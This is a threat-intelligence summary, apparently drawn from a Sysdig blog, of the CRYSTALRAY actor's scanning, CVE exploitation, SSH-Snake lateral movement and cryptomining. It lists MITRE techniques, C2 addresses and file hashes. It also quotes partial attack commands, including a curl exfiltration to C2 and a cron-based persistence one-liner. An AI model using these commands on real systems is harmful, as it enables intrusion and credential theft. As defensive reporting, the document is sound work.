CRYSTALRAY expanded from the SSH-Snake operation to conduct mass vulnerability scanning, exploitation, and backdoor deployment across 1,500+ victims, leveraging OSS tools from ProjectDiscovery. The group aims to steal credentials, deploy cryptominers, and maintain persistence, using tools like zmap, asn, httpx, nuclei, Platypus, and SSH-Snake. #CRYSTALRAY #SSH-Snake #Platypus #Sliver #Nuclei #Zmap #Httpx #Confluence #CVE-2022-44877
Keypoints
- CRYSTALRAY expanded its operations roughly 10x, targeting over 1,500 victims and more than 1,800 IPs.
- The actor relies on legitimate OSS tools from ProjectDiscovery (including pdtm, zmap, asn, httpx, nuclei, and Platypus) to automate discovery, scanning, and backdoor deployment.
- Reconnaissance uses country-specific IP ranges generated via ASN to focus scans, then zmap scans ports for vulnerable services, followed by httpx verification and nuclei CVE checks.
- Initial access often stems from modifying vulnerability PoCs (notably Confluence CVEs like CVE-2022-44877) to drop payloads and backdoors (Platypus/Sliver).
- Lateral movement hinges on SSH-Snake, which propagates using discovered SSH keys and credentials and exfiltrates data to its C2.
- Impact includes credential collection, cryptomining, and selling stolen credentials; dashboards (Platypus) track victims, with 100–400 per dashboard and broader scaling over time.
MITRE Techniques
- [T1595.001] Active Scanning – CRYSTALRAY creates a range of IPs for specific countries to launch scans with more precision than a botnet, but less precision than an APT or ransomware attack. “The United States and China combined for over 54% of the known targets.”
- [T1046] Network Service Discovery – zmap scans for vulnerable services across ports; “zmap is a single packet network scanner designed for internet-wide network surveys that is faster and has fewer false positives than nmap.”
- [T1595.001] Active Scanning – example commands to generate country CIDR blocks for scanning (Mexico example shown). “gt; asn -c .mx” and related pipelines.
- [T1021.004] SSH – Lateral Movement – SSH-SNAKE uses ssh keys and credentials it discovers to propagate to new systems. “SSH-SNAKE is a worm that uses ssh keys and credentials it discovers to propagate to new systems…”
- [T1555.003] Credentials in Environment Variables – Environment credential discovery and upload. “Environment Credentials… credentials in environment variables” and automated exfiltration of env data.
- [T1041] Exfiltration Over C2 Channel – C2 communication to exfiltrate results. “send the results from victims to their C2: … curl … to .”
- [T1053.005] Cron – Scheduled Task for cryptomining persistence – Linux cron-based persistence. “crontab -r (crontab -l 2>/dev/null; echo ‘* * * * * curl -v –user …’ … –background)”
Indicators of Compromise
- [Network] c2 IPs – 82.153.138.25, 157.245.193.241, 45.61.143.47 (c2)
- [Domain] aextg.us.to, linux.kyun.li, ww-1.us.to (c2)
- [Binaries] CMiz – a22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e; HQdI – c98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f
- [Binaries] igx1 – da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9; pmqE – 06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9
- [Binaries] hostctld – 1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec; logrotate – b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605
- [Files] db.exe – f037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089; processlib2.so – 8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039
- [Files] processlib.so – 908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21; hostctld (duplicate hash shown above)
Read more: https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/